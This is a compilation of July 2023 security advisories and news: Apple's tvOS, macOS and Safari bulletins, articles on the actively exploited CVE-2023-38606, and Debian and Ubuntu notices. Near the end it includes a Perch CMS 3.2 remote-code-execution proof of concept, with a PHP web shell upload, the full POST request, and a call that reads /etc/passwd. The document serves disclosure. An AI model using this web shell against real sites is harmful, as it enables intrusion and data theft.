Apple Security Advisory 2023-07-24-7 - tvOS 16.6 addresses bypass, code execution, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-7 tvOS 16.6

tvOS 16.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213846.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG  
Pte. Ltd.

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to modify sensitive kernel state. Apple is  
aware of a report that this issue may have been actively exploited  
against versions of iOS released before iOS 15.7.1.  
Description: This issue was addressed with improved state management.  
CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin  
(@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of  
Kaspersky

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-32381: an anonymous researcher  
CVE-2023-32433: Zweig of Kunlun Lab  
CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may lead to arbitrary code execution.  
Apple is aware of a report that this issue may have been actively  
exploited.  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher

WebKit Web Inspector  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLkACgkQ4RjMIDke  
Nxl5gRAA2z3qtF2NRTBpmW0GNmtwVB33PZUckSabe97M/lPYixnESGT30TbaQw8C  
u+aQrUoy5/WWJoXMGmIN6qVAstkWgXIbwV9oH113J5i2gHJrTDP0QPd2wUnd9jNz  
8mcjzlo52CE0h+ZzQqzsu/CItiTLpPQctoy8DAlx6GFibVikUTgXkOsEXw6iPPgQ  
c5ouEb9rSidOeYGjaRjXoDRtBT8FWxpC3bWietSxHcIVYq/ThMGcOMpzJiTBjjCV  
oiq8te/4G/YZgqhweMSuLh4eZWNP9mQOBrPd1h0DD5WtkqjGlMpMYE2CAIYGfaUR  
aWwxZV534ilZr1IzRSgmqt0d4C/7Jk69RsM6h3KhUSd87zMgNV6AS1khUEEzXNp5  
tGyw4EQ+FGr4hzJtYmVx+8g5kfH00JyrcAiuALj9lska4ZPWcz7WnS0+R4GsDaw6  
tjEeXa5VJJi5KnBDNhml0QXd99cADI/mqz5/LL+SLPNFn1/5k+A6Qbj19nbx9UBp  
oVfA0+LDHfUlt+pC75jwHqoV/4X/UOoAAER3yjkz4SNHCeqfD7ZzwhIg/x2+YcyS  
BRVdo+8xe4ckC2lkkt6Sa7EUt7G4nmIyE2RhPYxjVpUwbv7MzRSXFz0TX5p+vk4K  
pwNhnGty7Vc8FMhT1iH+MmpkgYiev5pAzAfw+oetoQQ3NElCCAs=  
=+SMD  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-7

Apple Security Advisory 2023-07-24-4 - macOS Ventura 13.5 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-4 macOS Ventura 13.5

macOS Ventura 13.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213843.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-38580: Mohamed GHANNAM (@_simo36)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to determine a user’s current location  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2023-36862: Mickey Jin (@patch1t)

AppSandbox  
Available for: macOS Ventura  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-32364: Gergely Kalman (@gergely_kalman)

Assets  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with improved data protection.  
CVE-2023-35983: Mickey Jin (@patch1t)

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating curl.  
CVE-2023-28319  
CVE-2023-28320  
CVE-2023-28321  
CVE-2023-28322

Find My  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-32416: Wojciech Regula of SecuRing (wojciechregula.blog)

Grapher  
Available for: macOS Ventura  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
CVE-2023-32418: Bool of YunShangHuaAn(云上华安)  
CVE-2023-36854: Bool of YunShangHuaAn(云上华安)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG  
Pte. Ltd.  
CVE-2023-38261: an anonymous researcher  
CVE-2023-38424: Certik Skyfall Team  
CVE-2023-38425: Certik Skyfall Team

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-32381: an anonymous researcher  
CVE-2023-32433: Zweig of Kunlun Lab  
CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

Kernel  
Available for: macOS Ventura  
Impact: A user may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-38410: an anonymous researcher

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to modify sensitive kernel state. Apple is  
aware of a report that this issue may have been actively exploited  
against versions of iOS released before iOS 15.7.1.  
Description: This issue was addressed with improved state management.  
CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin  
(@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of  
Kaspersky

Kernel  
Available for: macOS Ventura  
Impact: A remote user may be able to cause a denial-of-service  
Description: The issue was addressed with improved checks.  
CVE-2023-38603: Zweig of Kunlun Lab

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to gain root privileges  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2023-38565: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service  
Description: A logic issue was addressed with improved checks.  
CVE-2023-38593: Noah Roskin-Frazee

Model I/O  
Available for: macOS Ventura  
Impact: Processing a 3D model may result in disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-38258: Mickey Jin (@patch1t)  
CVE-2023-38421: Mickey Jin (@patch1t)

OpenLDAP  
Available for: macOS Ventura  
Impact: A remote user may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-2953: Sandipan Roy

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-38259: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-38564: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-38602: Arsenii Kostromin (0x3c3e)

Shortcuts  
Available for: macOS Ventura  
Impact: A shortcut may be able to modify sensitive Shortcuts app  
settings  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-32442: an anonymous researcher

sips  
Available for: macOS Ventura  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-32443: David Hoyt of Hoyt LLC

SystemMigration  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved checks.  
CVE-2023-32429: Wenchao Li and Xiaolong Bai of Hangzhou Orange Shield  
Information Technology Co., Ltd.

Voice Memos  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with additional permissions checks.  
CVE-2023-38608: Yiğit Can YILMAZ (@yilmazcanyigit), Kirin (@Pwnrin), and  
Yishu Wang

WebKit  
Available for: macOS Ventura  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution.  
Apple is aware of a report that this issue may have been actively  
exploited.  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher  
This issue was first addressed in Rapid Security Response macOS Ventura  
13.4.1 (c).

WebKit Process Model  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

WebKit Web Inspector  
Available for: macOS Ventura  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Additional recognition

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Ventura 13.5 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLcACgkQ4RjMIDke  
NxmkZRAAjjxwr78rla+am6CeQzC7jrb5mJPfrgSv4AYzFxicpRPdgS1Ccq4g4//i  
mEBcguqRuxmalSzHNgzRRFpynHaOri5d0YIoersRkDAtzzOAyAF81sszYL0vxxJo  
9vDpuLfbehX5xsHN8K0owJwFAmLAMiCJrWlAOYlxEsiERszr3cC8rmX5pYgenWFZ  
N9HM5vP/l7HLDdLEdGEympiofQ/GJAL85ZxV8cXKUhCHdymaAv+vE9yUBO1PrZVA  
T9K5BLmwP0jPe8GrvzQqYtvC5LWn1MzMV9bOj/M2yZ98TYn+pZZkrF1LJbiW+qHz  
xj2DEgqosTrTERbbHp4WkI+4Q8iCMgB2x1b2z1Ro/rck58yabb5IweWBjnwdyBXK  
lba6siFP3hhwCwvdx06Dgv4hzPQw6Rz5s9ZEToqVyxaq68gRqCWgI8u6A69th73J  
oqxbcwuz7cIWokvDHYn66BD9+R6jXtcKt1Ina6SKsIeIC2sG3keOlC5mTvgPbaaS  
IEeaO7NdkDAEdD3VWhDuB6nR2womKMJufcOwcwE0CD9HDxOruCt4ty9AX12R9N26  
9y/9KoF5VzyJh+YEU0G0moj0b+ugu4E8FziVsb5z+CxPt0KZs9SgU3dIIaneo/yB  
8UeZq3pAeIzBZkANlYYXhMOk7Bd5yA/8eYwfS6HxeG9OIM6a1V4=  
=moFJ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-4

Apple Security Advisory 2023-07-24-1 - Safari 16.6 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-1 Safari 16.6

Safari 16.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213847.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit Process Model  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

WebKit Web Inspector  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Additional recognition

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Safari 16.6 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLUACgkQ4RjMIDke  
NxmswA/+Ogpb238ypqmIxTWos/b/TTV2uTnDHQHuKGVBMiVy0Rh+3Cnu2GTTSLiC  
bYh2hWCXP3jarhE3/dosv7AhtYvDHYgh0fCbVCRn43rTGVMpJGSAZ3NzyfD76fPQ  
4XlaGZuf9326GGXq9lY00Ga98zA0Hf40JJzVpYXgoLopmVml8lgRyJSN1EVjXPJR  
fKJSe0y/aKHmH1qAIyVG4Q0qMVTamRCUmZwSp++UZ/gwg2E3qBTT30voPmvw1onW  
uRMdUXyh+K74/O7nan6P5z/WHuUAdRX6Hpjr7IvNcasm/KPEBOfj4lx1YwWJ592E  
F0o+d2k7awPElXMfsGTewW1HynJuis57AN808XOYjBCd+pKKlQq6NdKun87d3zxr  
RjmDdh4Yoqs3aaDckRYk8arq4g0/mKn9wSiVXwvoYC5YBePR8CQxzdP98gAqhjQM  
y9w1xPyb0Y5qCNPhPw4dk7OSrLI3y8Z+BWdMc/TIO+GOHYMdM4BtUoZ/M5T3Nqgb  
++EAggF5ajSJXmHNEVS5zLDcuP+HSYqQphqc8y6WMmWHM8tLA53OWiTDMSHP5n0x  
OFdgAYgegvc2dDbhDjVMAaVJuWqMKtsnIO//1+9ffBk4QSkQUZwGk3ybO+r27V4a  
1NzO/xMvepp/ZHj+R7j+bE4KVw6bPX43agaE+00WMMx+TqVXa4c=  
=RW2J  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-1

Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one actively exploited zero-day bug in the wild.
Tracked as CVE-2023-38606, the shortcoming resides in the kernel and permits a malicious app to modify sensitive kernel state potentially. The company said it was addressed with improved state management.
"

Endpoint Security / Zero Day

Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one actively exploited zero-day bug in the wild.

Tracked as **CVE-2023-38606**, the shortcoming resides in the kernel and permits a malicious app to modify sensitive kernel state potentially. The company said it was addressed with improved state management.

"Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1," the tech giant noted in its advisory.

It's worth noting that CVE-2023-38606 is the third security vulnerability discovered in connection with Operation Triangulation, a sophisticated mobile cyber espionage campaign targeting iOS devices since 2019 using a zero-click exploit chain. The other two zero-days, CVE-2023-32434 and CVE-2023-32435, were patched by Apple last month.

Kaspersky researchers Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin, Leonid Bezvershenko, and Boris Larin have been credited with discovering and reporting the flaw.

The updates are available for the following devices and operating systems -

*   iOS 16.6 and iPadOS 16.6 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   iOS 15.7.8 and iPadOS 15.7.8 - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
*   macOS Ventura 13.5, macOS Monterey 12.6.8, and macOS Big Sur 11.7.9
*   tvOS 16.6 - Apple TV 4K (all models) and Apple TV HD, and
*   watchOS 9.6 \- Apple Watch Series 4 and later

With the latest round of patches, Apple has resolved a total of 11 zero-days impacting its software since the start of 2023. It also comes two weeks after the company published emergency fixes for a remote code execution bug in WebKit that could lead to arbitrary code execution (CVE-2023-37450).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Rolls Out Urgent Patches for Zero-Day Flaws Impacting iPhones, iPads and Macs

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  WebKit

Tags:  CVE-2023-38606

Tags:  CVE-2023-32409

Tags:  CVE-2023-37450

Tags:  CVE-2023-32416

Apple has released security updates for several products to address several serious vulnerabilities including some actively exploited zero-days.



(Read more...)




The post Update now! Apple fixes several serious vulnerabilities appeared first on Malwarebytes Labs.

Apple has released security updates for several products to address several serious vulnerabilities  including some actively exploited zero-days. Updates are available for these products:

 Safari 16.6

 macOS Big Sur and macOS Monterey

 iOS 16.6 and iPadOS 16.6

 iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

 iOS 15.7.8 and iPadOS 15.7.8 

 iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

 macOS Ventura 13.5

 macOS Ventura

 macOS Monterey 12.6.8

 macOS Monterey

 macOS Big Sur 11.7.9

 macOS Big Sur

 tvOS 16.6

 Apple TV 4K (all models) and Apple TV HD

 watchOS 9.6

 Apple Watch Series 4 and later

The updates may already have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.

How to update your iPhone or iPad.

How to update macOS on Mac.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. Some of the notable CVEs patched in these updates are:

CVE-2023-38606: A vulnerability in the kernel that may allow an app to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. The exploitation of this vulnerability took place as part of a 0-click exploit chain used to install spyware. These exploitation methods are named like that because they require no user interaction to compromise a device.

CVE-2023-32409: a vulnerability in the WebKit. A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited. A patch for this vulnerability was issued in May for iOS 16 and iPadOS 16, but is now also available for iOS 15.7.8 and iPadOS 15.7.8.

WebKit is the engine that powers the Safari web browser on Macs as well as all browsers on iOS and iPadOS (all web browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

CVE-2023-37450: Another WebKit vulnerability where processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This vulnerability has been covered by a Rapid Security Response (RSR) earlier because Apple was aware of a report that this issue may have been actively exploited.

CVE-2023-32416: a vulnerability in the Find My app which could allow another app to read sensitive location information. This issue was addressed with improved restrictions.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Apple fixes several serious vulnerabilities

Debian Linux Security Advisory 5457-1 - An anonymous researcher discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5457-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
July 22, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-37450

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-37450

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution. Apple is aware of a report that  
    this issue may have been actively exploited.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.40.3-2~deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.40.3-2~deb12u2.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmS7l4cACgkQAAyEYu0C  
2AJr/BAAnyKHOHxiOroDoQHyo/DrX4rS7UTRb3TQKmgxxlehEAm40lO7jMTG1HLD  
HW8v7Jk9dguaqD4pV09rR3lfFrHb24jzyPZs07sQ3m1c9JQUXJybcsCkbLZlXH/V  
BHiv/oUjLK6FW4lHzhx3YjJ1kw9V9w5VO1neTjP4N9PK9TSGmZyPeHFlWG/Rq9fN  
jDU2PdS48TZK3enBfGEcaKOUcdxUsqWIIRh8nJY1EXVXUpmujjb8oJEHltNlSoe7  
NGmaWsPmpRz71JYkFVzRRwcxqa1UEi4abMy9VHzPgcGomLXESbDhlZYGLPMmhV5s  
lV6w73j1qDTpDZrsB7klm/MoABkqED6gwg1GktwmOFC07hC2PQt1Kd5ubQGX041k  
0XCKf+JavPDsYgN2FV9BsuOvDXJX2hf21jcgw/M7nX0byVEpG+rZrzdecEPMND8I  
+v0Lugs8D+Zg/80QaVqhA1hTQcwJgZVDn2GhB+8GfB4i0zhERHugkQsjCMIgkeh3  
XQw8dXixJNCCG3S6G63lJaRgKyw2lDlG1yYuEgQlXvxsopIHc9Itt71sPgTd5Fsk  
nvXiwMRkuqmytbOIcfaaIqPAe146l6O22sGICeYU59GdoEWcSstQCO6Gd1PJDJ8I  
8h4IFTwxPGbVq5WIyX8mogK/n8FTPb788HrYcK/NLcCu5Kh23xY=  
=g6Fh  
-----END PGP SIGNATURE-----

Debian Security Advisory 5457-1

Perch version 3.2 suffers from a remote code execution vulnerability.

    Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Perch 3.2 Remote Code Execution

Ubuntu Security Notice 6232-1 - It was discovered that wkhtmltopdf was not properly enforcing the same-origin policy when processing certain HTML files. If a user or automated system using wkhtmltopdf were tricked into processing a specially crafted HTML file, an attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6232-1  
July 20, 2023

wkhtmltopdf vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

wkhtmltopdf could be made to expose sensitive information if it opened a  
specially crafted file.

Software Description:  
- wkhtmltopdf: Command line utility to convert html to pdf using WebKit

Details:

It was discovered that wkhtmltopdf was not properly enforcing the  
same-origin policy when processing certain HTML files. If a user or  
automated system using wkhtmltopdf were tricked into processing a  
specially crafted HTML file, an attacker could possibly use this issue to  
expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
wkhtmltopdf 0.12.5-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.4-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.2.4-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.9.9-4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6232-1  
CVE-2020-21365

Package Information:  
https://launchpad.net/ubuntu/+source/wkhtmltopdf/0.12.5-1ubuntu0.1

Ubuntu Security Notice USN-6232-1

